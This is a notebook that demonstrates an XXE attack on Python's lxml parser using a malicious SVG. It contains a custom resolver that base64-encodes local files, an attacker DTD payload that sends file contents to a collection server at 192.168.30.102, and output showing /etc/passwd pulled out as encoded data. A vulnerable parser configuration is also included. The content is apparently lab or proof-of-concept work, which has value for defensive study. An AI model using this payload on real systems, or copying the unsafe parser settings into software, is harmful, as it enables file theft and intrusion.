In [94]:
from urllib.parse import quote
from urllib.parse import urlparse
from lxml import etree
import requests
import base64

class CustomResolver(etree.Resolver):
        
    def resolve(self, url, public_id, context):
        print(f'resolving: {url}')
        if url.startswith("file://"):
            parsed_uri = urlparse(url)
            file_path = parsed_uri.path
            with open(file_path, "rb") as file:
                encoded_string = base64.b64encode(file.read())
            return self.resolve_string(encoded_string, context)
        super().resolve(url, public_id, context)


In [95]:
parser = etree.XMLParser(load_dtd=True, no_network=False, resolve_entities=True, recover=False, huge_tree=True)
parser.resolvers.add(CustomResolver())
tree = etree.parse("evil.svg", parser)

resolving: evil.svg
resolving: http://192.168.30.102:9090/xxe.dtd
resolving: file:///etc/passwd
resolving: http://192.168.30.102:9091/?collect=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsa

In [ ]:
# attacker dtd file
# <!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.30.102:9091/?collect=%file;'>">
# %all;

# class SVGImageParser(object):
#     def __init__(self, xml_data):
#         self.xml_data = xml_data
#         self.tree = None

#     def parse(self):
#         try:
#             parser = etree.XMLParser(load_dtd=True, no_network=False)
#             self.tree = etree.fromstring(self.xml_data, parser=parser)
#         except etree.XMLSyntaxError as e:
#             raise ValueError("Invalid XML data: {}".format(str(e)))
